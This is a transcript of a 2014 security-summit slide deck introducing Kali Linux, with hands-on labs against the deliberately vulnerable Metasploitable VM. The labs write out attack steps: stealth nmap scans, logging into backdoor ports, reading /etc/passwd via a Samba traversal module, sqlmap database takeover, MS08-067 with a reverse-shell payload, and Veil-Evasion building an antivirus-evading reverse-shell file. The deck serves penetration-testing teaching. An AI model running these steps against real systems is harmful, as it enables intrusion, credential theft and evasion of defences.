kali linux - falconer - iss 2014
DESCRIPTION
This is a presentation and how-to I gave at the Information Security Summit 2014.TRANSCRIPT
What is Kali Linux?Information Security Summit 2014
Westlake, Ohio
Welcome to ISS 2014
Welcome
Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body
of knowledge of security administration, is a regular contributor to a variety of Linux
publications, and has written technical content for Linux education nation-wide at the college level.
He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and
System Forensics.
Welcome
Side Note:
I put a lot of extra materials, websites, & definitions in the ‘Notes’ section of this PPT.
Overview of Presentation
Intro, Description, How used, Background
Extra Info, Kali in a Box, Raspberry PI
Tools, Overview, & Conclusion
Setting up the Environments
CLI 101 / Tools 101
Kali 101, 201, & 301
Presentation on Kali LinuxIntro
Who or What is ‘Kali’?
Who is Kali?
Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively!
Anu Yadavalli
Hindu Kali
What is Kali Linux?
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
BackTrack?
Kali Linux is the ‘rebirth’ of BackTrack Linux. This is a custom distribution designed for security testing for all skill levels from novice to expert. It is the largest collection of wireless hacking, server exploiting, web application assessing, social-engineering tools available in a single Linux distribution.
Developers - March 12, 2013
“Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.”
Developers - March 12, 2013
“After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.
Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux.”
Warning!
Kali Linux’s developers would like everyone to use Kali Linux. But, Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing and as such. It is NOTa recommended distribution for those unfamiliar with Linux.
Hardware / Software
Kali likes its own dedicated hardware. If you are learning about Kali and penetration testing (Metaspolitable) then a virtualized environment may be a consideration. VMware Player 5 works well and set the RAM to 1gb.
Hardware / Software
Kali recommends 10gb for the initial install, 512MB RAM min, i386/AMD64, CD/DVD / USB support.
Now…if ‘Veil’ is installed (+ 10gb) and doing the updates/upgrades (+ 5gb), and don’t forget the Alfa antenna.
http://www.kali.org/
Other guys?
Other guys? BackBox
BackBox is an Ubuntu-based distribution developed to perform penetration tests and security assessments. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools.
Other guys? Pentoo
Pentoo is a Live CD/USB designed for penetration testing and security assessment. Based on Gentoo, it is provided both as 32/64 bit installable livecd. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment.
Other guys? BlackBuntu
BlackBuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10.
Other guys? EnGarde
EnGarde Secure Linux was designed to support features suitable for individuals, students, security enthusiasts, and those wishing to evaluate the level of security and ease of management available in Guardian Digital enterprise products.
Other guys? A few more….
Presentation on Kali LinuxCategories & Websites
What’s in the box, Pandora?
There are several categories
Top 10 Security ToolsInformation GatheringVulnerability Analysis
Web Applications / Password AttacksWireless Attacks / Exploitation Tools
Sniffing/Spoofing / Maintaining AccessReverse Engineering
Stress Testing / Hardware HackingForensics / Reporting Tools
System Services
Metapackages also exist
Kali InformationSee ‘Notes’ section in this slide
Information
Getting your pentesting lab ready
Hacking tutorial
20 things to do after installing Kali
Cracking WEP
6 Resources & Tutorials on Kali
Kali & More PenTestingSee ‘Notes’ section in this slide
Kali & More PenTesting
PenTest Tools
Penetration Testing Tools
PenTestMag
Chrome as a PenTest Tool
Firefox as a PenTest Tool
Kali-specific WebsitesSee ‘Notes’ section in this slide
Kali-specific Websites
Kali4Hackers
Hacking with Kali Linux
YouTube
Kali Linux
Hack with Kali Linux
Kali PublicationsSee ‘Notes’ section in this slide
Kali Publications
Kali Book
BackTrack to Kali
Basic Security Testing with Kali
Kali Linux Assuring Security
Kali in a box?
Do you want to run Kali on tablet or phone?http://www.kali.org/how-to/kali-linux-android-linux-deploy/
Kali in a box?
Basically….
1.Get a tablet1. Install ‘Linux Deploy’ 2. Install Samsung Kies on PC3. Tablet - USB Debugging ON4. Install SuperOneClick on PC5. Wait 5 minutes…6. Done
Kali + Nexus = NetHunter
Do you want to run Kali on a Nexus?http://www.kali.org/kali-linux-nethunter/
Kali on a Nexus?
Kali & Lifehacker
How to hack your own network and beef up its security with Kali Linux
http://lifehacker.com/how-to-hack-your-own-network-and-
beef-up-its-security-w-1649785071
Kali & Raspberry PISee ‘Notes’ section in this slide
What is Metaspolitable?See ‘Notes’ section in this slide
Metaspolitable?
Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
The default login and password is msfadmin:msfadmin.
Presentation on Kali LinuxDVD, Tools, Demo
What’s on the DVD?
/books◦Official Kali Guide
◦eForensics◦Other published materials
/media◦7-Zip, kali_iso, metaspolitable doc, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager
/PPT
Legend
We’re going to type something
We’re going to make a note
Might be a question?
We’re going to click on something
Recon Attack
traceroute
traceroute
Essentially, ‘tracert’ in Windows
traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
nmap
nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
nmap
nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.
rpcinfo
rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
tcpdump
On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…ping www.yahoo.comopen a Browser & go to CNN.com
nikto
On Kali
nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
whatweb
From Kali
whatweb <Target IP>
whatweb –v <Target IP>
whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
Zenmap
Let’s run Zenmap
Applications Kali Linux
Information Gathering
DNS Analysis
Zenmap
SHODAN
Let’s run SHODAN
Open a browser
www.shodanhq.com
type in ‘almost anything’
…Be very nervous…
dmitry
If you want something more basic…dmitry
dmitry –s <domain.com>
It gives you site names & IP’s
Presentation on Kali LinuxFinal Thoughts
Thank you
Thank you for your time.
Falconer Technologies
877 / TUX RULZ or 877 / 889-7859
Use your powers for good
Thank You
The second part of this slide deck covers more tools and hands-on.
Presentation on Kali LinuxLab #1 & Prep
Getting Ready…
- Let’s make a folder called kali_2014
- Copy the DVD contents into that folder- Install 7-Zip- Install VMware Player
Let’s make sure the virtual environments are working and can ‘ping’ each other
VMware Player
Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
Logins / Passwords
Kali Login rootKali Password password
Metaspolitable Login msfadminMetaspolitable Password msfadmin
Download Metaspolitable from: http://sourceforge.net/projects/metasploitable/
Metaspolitable V/E
Login msfadmin Password msfadmin
ifconfig
Jot down the IP & Netmask route
Jot down the Gateway
Metaspolitable V/E
Virtual Environment #1◦Metaspolitable
Go to TERMINALrlogin –l root <IP Address>cd /tmpls -l ...vs... ls -la
rm .X0-lock
startx
Kali V/E
Login root Password password
ifconfig
Jot down the IP & Netmask route
Jot down the Gateway
Kali V/E
Go to:
Applications System Tools Preferences System Settings Display Resolution: ____
Then…[Apply]
Kali Updating
From the command line, type
apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done after a new installation.
Presentation on Kali LinuxLab #2 – Command Line Tools
Command Line ToolsPresentation on Kali Linux
Legend
We’re going to type something
We’re going to make a note
Might be a question?
We’re going to click on something
Recon Attack
ping
ping
Packet InterNet GroperPort = 8
Establishes physical connectivity between two entities
(from Kali) ping <Target IP>
Did it echo back?
top
top
Tells us what services are running, processes, memory allocation
Basically, a live system monitor
df
df
Tells us how much space is available or ‘disk free’
du
du
Tells us how much space is taken or ‘disk used’.
You can get a shorter report by…
‘du –s’ … (disk used –summary)
free
free
How much ‘free’ memory is available
ls
ls
This is for ‘list’
ls –l (list –long) ls -la (list – long – all attributes)
pwd
pwd
Directory structure
Means ‘path to working directory’ or ‘print working directory’
ps / ps aux / pstree
ps
Means ‘Process Status’◦aux – auxiliary view◦pstree – shows parent/child relationships
◦Windows – tasklist / taskkill
Kill - Stops a process (ex: kill PID)
Presentation on Kali LinuxLab #3 – CLI & Services
CLI & ServicesPresentation on Kali Linux
traceroute
traceroute
Essentially, ‘tracert’ in Windows
traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
nmap
nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
nmap
nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.
rlogin (from Metaspolitable)
rlogin –l root <Target IP>
whoami
tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
rpcinfo
rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
showmount
showmount –e <Target IP>
showmount –a <Target IP>
It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.
telnet
telnet <Target IP> 21
After '220...'
user backdoored:)
<CTRL><]>
quit
Port 20/21 is FTP
telnet
telnet <Target IP> 6200
After 'Escape character...',
id;
<CTRL><]>
quit
Port 6200 - Oracle Notification Service remote port Oracle Application Server
telnet
telnet <Target IP> 6667
IRC (Internet Relay Chat)
Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.
telnet
telnet <Target IP> 1524
After 'root@meta....',
id
Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.
Presentation on Kali LinuxLab #4 – Working w/Metaspolitable
smbclient
smbclient –L <//Target IP>
msfconsole...wait, wait, wait..., then
use auxiliary/admin/smb/samba_symlink_traversal
set RHOST <Target IP>
set SMBSHARE tmp
smbclient
exploit
...Connecting to the server.....
...<yadda, yadda, yadda>...
...Auxiliary module....
At the prompt, type exit
smbclient
smbclient //<Target IP>/tmp
Do you get the 'smb: \>' prompt? cd rootfs cd etc more passwd
Do you get a list of all user accts?
tcpdump
On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…ping www.yahoo.comopen a Browser & go to CNN.com
netdiscover
On Kali
netdiscover –i eth0 –r <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly
developed for those wireless networks without DHCP server, when you are
wardriving. It can be also used on hub/switched networks.
nikto
On Kali
nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
sqlmap
On Kali
sqlmap –u http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database
servers.
Wasp Services
From Kali – open IceWeasel
http://<Target IP>/
Research: Multillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the
names) whose wingless females resemble large, hairy ants. Their common
name ‘velvet ant’ refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.
Web Services
From Kali – open IceWeasel
http://<Target IP>/
Research: Multillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security
enthusiest to pen-test and hack a web application
whatweb
From Kali
whatweb <Target IP>
whatweb –v <Target IP>
whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
Presentation on Kali LinuxLab #5 - msfconsole
From Kali - msfconsolePresentation on Kali Linux
msfconsole
From Kali
service postgresql start
service metasploit start
msfconsole
Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole
We will then take a look at the built-in exploit tools
msfconsole
From [msf>] console
help search
show exploits
search dns
‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in
exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
msfconsole
From [msf>] console
search Microsoft
search diablo
search irc
search http
Let’s try a few more to see what they do….
msfconsole
From [msf>] console, search for ‘unreal’
info <exploit>
use <exploit>
show options
LHOST, RHOST, LPORT, RPORT
msfconsole
From [msf>] console (ex: unreal)
set RHOST <IP Address>
show options
exploit
msfconsole
From [msf>] console, search for ‘twiki’
info <exploit>
use <exploit>
show options
LHOST, RHOST, LPORT, RPORT
msfconsole
From [msf>] console (ex: ‘twiki’)
set RHOST <IP Address>
show options
exploit
msfconsole
From [msf>] console, (target: Win XP)
use exploit/windows/smb/ms08_067_netapi
show options
show targets
set target 2
msfconsole
From [msf>] console, (target: Win XP)
show options
show advanced
show targets
show payloads
msfconsole
From [msf>] console, (target: Win XP)
set payload windows/shell_reverse_tcp
show options
set LHOST <Kali IP Address>
set RHOST <Target IP Address>
msfconsole
From [msf>] console, (target: Win XP)
show options
exploit
Any errors?
Presentation on Kali LinuxLab #6 – more GUI
From Kali – more GUIPresentation on Kali Linux
Zenmap
Let’s run Zenmap
Applications Kali Linux
Information Gathering
DNS Analysis
Zenmap
SHODAN
Let’s run SHODAN
Open a browser
www.shodanhq.com
type in ‘almost anything’
…Be very nervous…
FERN
Let’s run FERN
Kali Linux
Wireless Attacks
Wireless Tools
fern-wifi-cracker
recon-ng
Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng.
recon-ngautomated info gathering and network reconnaissance.
recon-ng
Let’s run recon-ng…
cd /opt/recon-ng
/usr/bin/python recon-ng
show modules
recon/hosts/gather/http/web/google_site
recon-ng
Let’s run recon-ng…
set DOMAIN <domain.com>
run (…let this run awhile…)
back (…previous level…)
show modules
recon-ng
Let’s run recon-ng…
use reporting/csv
run
Will add your new information to
/usr/share/recon-ng/workspaces/default
dmitry
If you want something more basic…dmitry
dmitry –s <domain.com>
It gives you site names & IP’s
veil
Kali has many built-in tools, but you can always install even more (Debian-based). You may always wish to add more such as veil.
veilRemote shell payload generator that can bypass many anti-virus programs.
veil
Let’s run veil
veil-evasion
list (available payloads list)
use 13 (powershell/VirtualAlloc)
generate
veil
Let’s run veil
1 (msfvenom)
[ENTER] (accept default)
Value for LHOST (Target IP)
Value for LPORT (ex: 4000)
veil
Let’s run veil
Output name (“Squatch”)
It will store this new batch file to the /usr/share/veil/output/source
folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
Presentation on Kali LinuxFinal Thoughts
Thank you
Thank you for your time.
Falconer Technologies
877 / TUX RULZ or 877 / 889-7859
Use your powers for good
Thank You